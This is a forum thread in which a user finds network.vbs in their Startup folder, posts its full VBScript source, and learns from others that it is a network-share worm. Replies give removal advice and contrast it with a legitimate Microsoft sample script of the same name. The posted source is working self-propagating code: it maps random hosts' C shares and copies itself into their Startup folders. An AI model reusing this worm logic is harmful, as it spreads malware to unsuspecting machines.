Is this a virus? (Visual Basic question)

[sailor]

My laptop computer crashes constantly and I am trying to determine the cause (without any success so far). It will work for a short while and then freeze. I can never shut it down correctly so every time it starts up it will run scandisk which is a RPITA.

Yesterday I was reading at MSNBC about the ILOVEYOU virus and others written in visual basic and there was the recommendation to disable the windows scripting host (control panel / install-remove programs / windows setup / accessories / windows scripting host) unless you really need it and it said most of us don’t need it. So I disabled it. I think this pretty much just means programs with a VBS extension will not run.

Today when I start the computer I get an error because it is trying to run a file called network.vbs which is located at windows / start menu / programs / startup

Lately I am not using any network but I do have some network components installed because I sometimes network with my home system. But for now I can do without the network working.

My question is this: Is network.vbs a legit network program or is it some malicious code? For the time being I will leave it disabled just to see if things improve but I’d like to know more as I am quitesuspicious.

I have looked at the code but I do not know visual basic. Whatever it is that is making my computer crash has not done any other harm like renaming or deleting files.

Here is the code. Can anyone tell me if this is legit software or not? What does this do?

If it is indeed malicious how could I get it? I have NEVER opened any attachments (I use OE5)

I will report here whether the computer continues to misbehave or improves with this file disabled

= = = = = = = = = = = =

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = “0”
dot = “.”
driveconnected=“0”
set wshnetwork = wscript.createobject(“wscript.network”)
Set fso1 = createobject(“scripting.filesystemobject”)
set fso2 = createobject(“scripting.filesystemobject”)
on error resume next
randomize
checkfile()
randaddress()

do
do while driveconnected = “0”
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive “j:”, sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop

msgbox “Done”

function disconnectdrive()
wshnetwork.removenetworkdrive “j:”
driveconnected = “0”
end function

function createlogfile()
Set myfile = fso1.createtextfile(“c:
etwork.log”, True)
end function

function checkfile()
If (fso1.fileexists(“c:
etwork.log”)) then
fso1.deletefile(“c:
etwork.log”)
createlogfile()
else
createlogfile()
end If
myfile.writeLine(“Log file Open”)
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject(“scripting.filesystemobject”)

fso.copyfile “c:
etwork.vbs”, “j:”

If (fso2.FileExists(“j:
etwork.vbs”)) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile “c:
etwork.vbs”, “j:\windows\startm~1\programs\startup”

fso.copyfile “c:
etwork.vbs”, “j:\windows”

fso.copyfile “c:
etwork.vbs”, “j:\windows\start menu\programs\startup”

fso.copyfile “c:
etwork.vbs”, “j:\win95\start menu\programs\startup”

fso.copyfile “c:
etwork.vbs”, “j:\win95\startm~1\programs\startup”

fso.copyfile “c:
etwork.vbs”, “j:\wind95”

end function

function checkaddress()
octd = octd + 1
if octd = “255” then randaddress()
end function

function shareformat()
sharename = “\” & octa & dot & octb & dot & octc & dot & octd & “\C”
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
’ driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd=“1”
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & “0”)
end function

= = = = = = = = = = =

[scr4]

There is indeed a CERT advisory on network.vbs “virus” (worm, malicious script, whatever you want to call it) at http://www.cert.org/incident_notes/IN-2000-02.html . Some more information at http://security.sdsc.edu/publications/network.vbs.shtml . It sounds like deleting the file should get rid of the worm though, so I’m not sure why it’s lingering.

[GaWd]

Sailor,

THat’s definitely a virus. I recommend that you delete the file, and any entry the refers to the file. Also, it refers to your J:\ drive. Inspect the J drive for the file as well, because it looks like this virus propagates on the network.

I think this is kinda cute:

function randum()
rand = int((254 * rnd) + 1)
end function

I like how this wannabe spelled Random That’s a pretty good indication that t’s a virus as well(I didn’t look for any virus notifications online).

As an aside, this a pretty poorly written virus because it’s commands show up in your system files. Makes it really easy to detect.

-Sam

[sailor]

scr4, Gawd, thanks for the input. Thise pages are a bit complicated for me to understand so I have copied them and will study them with more time. Since disabling VBS (and therefore that worm) the computer has not crashed again and closes down correctly. It seems the worm does nothing else but propagate itself? I do not have a J: drive on this computer (just C:) but I will remember to check my home system when I get back home in case it is there.

My question is how can I have got it? I have NEVER opened any attachments. Can I have got it merely by being connected to the Internet?

I have had trouble with virus detecting software in the past so I do not use it. Just use extreme caution… I need to know how this infected my system so I can prevent it.

thanks again for the info.

[sailor]

I feel particularly lucky that I have not lost any files with this virus-worm!

After reading those pages I think I may have an understanding of how it works. Can you please confirm or correct the following?

1- The worm selects addresses at random on the Internet and will propagate there if possible, Therefore my computer was selected at random. It did not arrive by email or browser but just because I was connected to the Internet.

2- I needed to have my drive set to share. If I do not share, the worm cannot implant. Therefore, it is best to only set to share when I am networking with my desktop (even better if disconnected from the Internet)and not share at all other times.

3- This particular worm uses VBS so disabling VBS will prevent it from working.

4- During the Couple of weeks it was active on my computer it probably infected other computers while I was connected…

Is that how it works?

[DougC]

• • • Just so’s you know; I have a version of network.vbs that looks considerably different from yours, and I have no problems. I assume mine is the correct one. From what I can understand (msgbox contents) I haven’t ever called this program. I do have VBasic 6; it looks like it may have been a sample included with that.
• I generally frown on posting long stuff, but it’s not that long and this way others can compare theirs also. - MC
  ------------code starts below this line--------------
  ’ Windows Script Host Sample Script
  ’
  ’ ------------------------------------------------------------------------
  ’ Copyright © 1996 Microsoft Corporation
  ’
  ’ You have a royalty-free right to use, modify, reproduce and distribute
  ’ the Sample Application Files (and/or any modified version) in any way
  ’ you find useful, provided that you agree that Microsoft has no warranty,
  ’ obligations or liability for any Sample Application Files.
  ’ ------------------------------------------------------------------------
  ’
  ’ This sample demonstrates how to use the WSHNetwork object.
  ’ It reads network properties (username and computername),
  ’ connects, disconnects, and enumerates network drives.
  L_Welcome_MsgBox_Message_Text = “This script demonstrates how to use the WSHNetwork object.”
  L_Welcome_MsgBox_Title_Text = “Windows Scripting Host Sample”
  Call Welcome()

’ ********************************************************************************
’ *
’ * WSH Network Object.
’ *

Dim WSHNetwork
Dim colDrives, SharePoint
Dim CRLF

CRLF = Chr(13) & Chr(10)
Set WSHNetwork = WScript.CreateObject(“WScript.Network”)
Function Ask(strAction)

’ This function asks the user whether to perform a specific “Action”
’ and sets a return code or quits script execution depending on the
’ button that the user presses. This function is called at various
’ points in the script below.

Dim intButton
intButton = MsgBox(strAction, _
                   vbQuestion + vbYesNo, _
                   L_Welcome_MsgBox_Title_Text )
Ask = intButton = vbYes

End Function

’ **************************************************
’ *
’ * Show WSHNetwork object properties
’ *
’ *
MsgBox “UserDomain” & Chr(9) & "= " & WSHNetwork.UserDomain & CRLF & _
“UserName” & Chr(9) & "= " & WSHNetwork.UserName & CRLF & _
“ComputerName” & Chr(9) & "= " & WSHNetwork.ComputerName, _
vbInformation + vbOKOnly, _
“WSHNetwork Properties”

’ **************************************************
’ *
’ * WSHNetwork.AddNetworkDrive
’ *
’ *

Function TryMapDrive(intDrive, strShare)
Dim strDrive
strDrive = Chr(intDrive + 64) & “:”
On Error Resume Next
WSHNetwork.MapNetworkDrive strDrive, strShare
TryMapDrive = Err.Number = 0
End Function

If Ask(“Do you want to connect a network drive?”) Then
strShare = InputBox("Enter network share you want to connect to ")
For intDrive = 26 To 5 Step -1
If TryMapDrive(intDrive, strShare) Then Exit For
Next

If intDrive <= 5 Then
    MsgBox "Unable to connect to network share. " & _
           "There are currently no drive letters available for use. " & _
           CRLF                                                          & _
           "Please disconnect one of your existing network connections " & _
           "and try this script again. ", _
           vbExclamation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text
Else
    strDrive = Chr(intDrive + 64) & ":"
    MsgBox "Connected " & strShare & " to drive " & strDrive, _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text

    If Ask("Do you want to disconnect the network drive you just created?") Then
        WSHNetwork.RemoveNetworkDrive strDrive

        MsgBox "Disconnected drive " & strDrive, _
               vbInformation + vbOkOnly, _
               L_Welcome_MsgBox_Title_Text
    End If
End If

End If
’ **************************************************
’ *
’ * WSHNetwork.EnumNetworkDrive
’ *
’ *
'Ask user whether to enumerate network drives
If Ask(“Do you want to enumerate connected network drives?”) Then
'Enumerate network drives into a collection object of type WshCollection
Set colDrives = WSHNetwork.EnumNetworkDrives

'If no network drives were enumerated, then inform user, else display
'enumerated drives
If colDrives.Count = 0 Then
    MsgBox "There are no drives to enumerate.", _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text
Else
    strMsg = "Current network drive connections: " & CRLF
    For i = 0 To colDrives.Count - 1 Step 2
        strMsg = strMsg & CRLF & colDrives(i) & Chr(9) & colDrives(i + 1)
    Next

    MsgBox strMsg, _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text

End If

End If

’ ********************************************************************************
’ *
’ * Welcome
’ *
Sub Welcome()
Dim intDoIt

intDoIt =  MsgBox(L_Welcome_MsgBox_Message_Text, _
                  vbOKCancel + vbInformation, _
                  L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
    WScript.Quit
End If

End Sub

[sailor]

yes, there is a legit MS sample program with the same name. Nothing to do with this other one though.